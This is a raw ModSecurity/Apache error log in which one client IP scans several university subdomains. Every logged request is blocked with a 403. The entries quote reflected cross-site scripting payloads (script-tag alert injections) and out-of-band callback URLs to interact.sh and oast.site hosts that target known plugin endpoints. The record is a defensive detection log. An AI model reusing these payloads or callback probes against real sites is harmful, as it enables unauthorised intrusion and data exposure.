[Tue Aug 29 11:57:08.864997 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16pMCo-f0AAAq5@eQAAAAK"]
[Tue Aug 29 11:57:08.896411 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BsAAAAV"]
[Tue Aug 29 11:57:09.719425 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16pcCo-f0AAArcTNUAAAAH"]
[Tue Aug 29 11:57:09.731452 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pcCo-f0AAArbWV8AAAAG"]
[Tue Aug 29 11:57:11.732494 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAm80VEAAAAF"]
[Tue Aug 29 11:57:11.766220 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAm80VIAAAAF"]
[Tue Aug 29 11:57:11.773510 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAq5@fkAAAAK"]
[Tue Aug 29 11:57:11.864934 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAm80VYAAAAF"]
[Tue Aug 29 11:57:11.872981 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAq5@f4AAAAK"]
[Tue Aug 29 11:57:11.931974 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAnEqZcAAAAO"]
[Tue Aug 29 11:57:11.976520 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAq5@gIAAAAK"]
[Tue Aug 29 11:57:12.168263 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/listings/"] [unique_id "ZO16qMCo-f0AAAnEqZ0AAAAO"]
[Tue Aug 29 11:57:12.168532 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@gYAAAAK"]
[Tue Aug 29 11:57:12.263044 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@goAAAAK"]
[Tue Aug 29 11:57:12.577383 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16qMCo-f0AAAnEqaIAAAAO"]
[Tue Aug 29 11:57:14.173377 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qsCo-f0AAArdQfwAAAAI"]
[Tue Aug 29 11:57:18.560206 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb07wim6cuxqxbc4.oast.site found within TX:1: cjmnijtjmimvgniikdb07wim6cuxqxbc4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAm80YMAAAAF"]
[Tue Aug 29 11:57:18.594369 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAocypIAAAAR"]
[Tue Aug 29 11:57:18.599382 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAnEqcIAAAAO"]
[Tue Aug 29 11:57:18.651449 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArfAWoAAAAP"]
[Tue Aug 29 11:57:18.714810 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0cad5w8b4e53gj.oast.site found within TX:1: cjmnijtjmimvgniikdb0cad5w8b4e53gj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArfAWwAAAAP"]
[Tue Aug 29 11:57:18.716015 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAoz8dEAAAAS"]
[Tue Aug 29 11:57:18.717417 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb04unsuxrs1so9c.oast.site found within TX:1: cjmnijtjmimvgniikdb04unsuxrs1so9c.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAocypUAAAAR"]
[Tue Aug 29 11:57:18.771473 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0j7nfprcsmcdfn.oast.site found within TX:1: cjmnijtjmimvgniikdb0j7nfprcsmcdfn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArLLhcAAAAb"]
